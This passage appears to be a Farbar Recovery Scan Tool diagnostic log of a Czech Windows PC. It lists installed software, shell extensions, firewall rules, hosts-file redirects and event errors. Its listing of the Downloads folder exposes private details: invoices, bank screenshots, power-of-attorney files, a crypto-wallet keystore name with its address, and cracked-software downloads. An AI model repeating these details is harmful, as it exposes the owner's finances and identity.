Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in
2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
13-01-2021 21:32:33 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
System errors:
=============
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
